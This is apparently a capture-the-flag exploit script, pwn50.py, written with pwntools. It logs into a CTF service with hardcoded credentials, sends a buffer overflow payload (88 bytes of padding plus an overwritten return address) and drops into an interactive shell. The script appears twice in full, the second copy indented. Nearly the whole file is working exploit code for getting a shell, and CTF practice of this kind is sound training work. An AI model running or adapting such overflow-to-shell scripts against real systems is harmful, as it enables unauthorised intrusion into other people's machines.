faidamine/pwn50.py

## pwn50.py
#!/usr/bin/python

#Author : Faid Amine

from pwn import *

#LSE{e4xxxxxxxxxxx}

#Login Info
user = "admin"
passw = "T6OBSh2i"

s = remote('ctf.lse.epita.fr',52190)

command = "/bin/sh"
off = 88

#### PAYLOAD

payload = "A"*off
payload += p64(0x40084a)

## Connect

s.recvuntil("username: ")
s.sendline(user)

s.recvuntil("password: ")
s.sendline(passw)

s.recvuntil("choice: ")
s.sendline("1")

### Send Command /bin/sh

s.recvuntil("Command: ")
s.sendline(command)

###  Send Payload

s.recvuntil("choice: ")
s.sendline(payload)

### Exit
s.recvuntil("choice: ")
s.sendline("3")


s.interactive()
	#!/usr/bin/python

	#Author : Faid Amine

	from pwn import *

	#LSE{e4xxxxxxxxxxx}

	#Login Info
	user = "admin"
	passw = "T6OBSh2i"

	s = remote('ctf.lse.epita.fr',52190)

	command = "/bin/sh"
	off = 88

	#### PAYLOAD

	payload = "A"*off
	payload += p64(0x40084a)

	## Connect

	s.recvuntil("username: ")
	s.sendline(user)

	s.recvuntil("password: ")
	s.sendline(passw)

	s.recvuntil("choice: ")
	s.sendline("1")

	### Send Command /bin/sh

	s.recvuntil("Command: ")
	s.sendline(command)

	### Send Payload

	s.recvuntil("choice: ")
	s.sendline(payload)

	### Exit
	s.recvuntil("choice: ")
	s.sendline("3")


	s.interactive()